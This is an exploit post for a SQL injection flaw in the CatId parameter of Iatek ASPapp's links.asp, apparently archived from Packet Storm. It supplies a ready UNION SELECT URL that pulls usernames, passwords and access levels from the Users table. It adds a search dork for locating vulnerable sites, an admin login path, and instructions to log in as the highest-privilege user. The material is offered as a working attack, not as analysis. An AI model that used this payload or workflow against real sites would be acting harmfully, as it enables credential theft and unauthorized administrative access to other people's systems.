ASPapp suffers from a remote SQL injection vulnerability in links.asp.
89be16a6ce8de1ebe0f3e7bfc849aa44b3fe63d8e459654501a02f528ed774d1..##.....##
...##...##
....##.##
.....###CoRPITX
.....###
....##.##
...##...##
..##.....##
-----------------Turkey--------------------------------------
--------- www.Hayalet-hack.com-------------------------------
----------www.xcorpitx-hack.com------------------------------
Iatek | ASPapp -links.asp (CatId) SQL Injection Vulnerability
-------------------------------------------------
you ll see lots of users like this but accesslevel ll help you for see admin
-------------------------------------------------------------
----------------example--------------------------------------
Links › guest › 12 › 1 user
Links › editor › editor › 2 materator
Links › manager› manager› 2 materator
Links › surco › surco › 2 materator
Links › admin › admin › 3 admin
Links › ovivas › ovivas › 4 super-admin----- we ll login with this username
-------------------------------------------------------------
-------------------------------------------------------------
i mean.. when you see big number 4 or 5 you can use this username and password
-------------------------------------------------------------
-------
dork - ''links.asp?CatId''
-------
exploit-
-------
admin login-
-------
www.xxx.com/path/login.asp?ret_page=%2Fzmicer%2Fweb%2Fadmin%2Easp%3F
-------
-------------------------------------------------------------
links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,user_name,%205%20,password,null%20FROM%20Users
-------------------------------------------------------------
thanx- str0ke-D3ng3siz-pc faresi-s@bun-Hayalet-Turque-
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed